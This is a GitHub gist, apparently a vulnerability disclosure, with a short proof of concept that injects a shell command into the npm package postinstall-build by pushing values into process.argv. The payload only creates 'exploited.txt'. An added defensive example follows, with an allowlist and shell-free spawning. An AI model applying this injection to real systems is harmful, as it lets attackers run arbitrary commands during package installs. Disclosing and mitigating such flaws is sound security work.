@mcoimbra
Created October 29, 2023 22:29
Package postinstall-build: it is possible to inject a custom command and arguments by pushing into process.argv.
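'use strict';
const pkg = require('postinstall-build');
// The module reads the ambient process.argv of the calling process, so values
// pushed here are treated as if they were its own command-line arguments.
process.argv.push('touch');
process.argv.push('touch exploited.txt');
/*
 * This will lead to exec(cmd) with cmd = 'touch exploited.txt' on
 * line #326 of src/index.js.
 * A local 'exploited.txt' file will be created.
 */
pkg();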
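
A defensive counterpart to the pattern above, as an added example that is not part of the gist or of postinstall-build's code: a hypothetical install-time helper that takes its arguments explicitly instead of from process.argv, allows only named npm scripts, and spawns without a shell. The names resolveBuildCommand, runBuild and ALLOWED_SCRIPTS are assumptions, and the example assumes npm is on PATH on a POSIX host.

```javascript
'use strict';
const { spawnSync } = require('child_process');

// Hypothetical allowlist of npm script names the package agrees to run.
const ALLOWED_SCRIPTS = new Set(['build', 'prepare', 'compile']);

// Validate caller-supplied arguments and return a fixed argument vector.
// Input is an explicit array, never the ambient process.argv, so code that
// merely require()s this module cannot steer it through global state.
function resolveBuildCommand(args, allowed = ALLOWED_SCRIPTS) {
  if (!Array.isArray(args) || args.length !== 2) {
    throw new TypeError('expected [artifact, scriptName]');
  }
  const [artifact, script] = args;
  if (typeof artifact !== 'string' || artifact.length === 0) {
    throw new TypeError('artifact must be a non-empty string');
  }
  if (typeof script !== 'string' || !allowed.has(script)) {
    throw new Error('build script not allowed: ' + JSON.stringify(script));
  }
  return { artifact, file: 'npm', argv: ['run', script] };
}

// Run the build without a shell: each argv entry reaches the child process
// verbatim, so spaces or metacharacters are never interpreted as commands.
// `spawn` is injectable so the behaviour can be checked without running npm.
function runBuild(args, spawn = spawnSync) {
  const { file, argv } = resolveBuildCommand(args);
  return spawn(file, argv, { shell: false, stdio: 'inherit' });
}

// Constructed inputs: the gist's argv shape first, then a legitimate one.
function demo() {
  const calls = [];
  const fakeSpawn = (file, argv, opts) => { calls.push({ file, argv, opts }); return { status: 0 }; };
  const results = [];
  for (const args of [['touch', 'touch exploited.txt'], ['lib', 'build']]) {
    try {
      runBuild(args, fakeSpawn);
      results.push('ran');
    } catch (err) {
      results.push('rejected');
    }
  }
  return { results, calls };
}

console.log(demo().results);
```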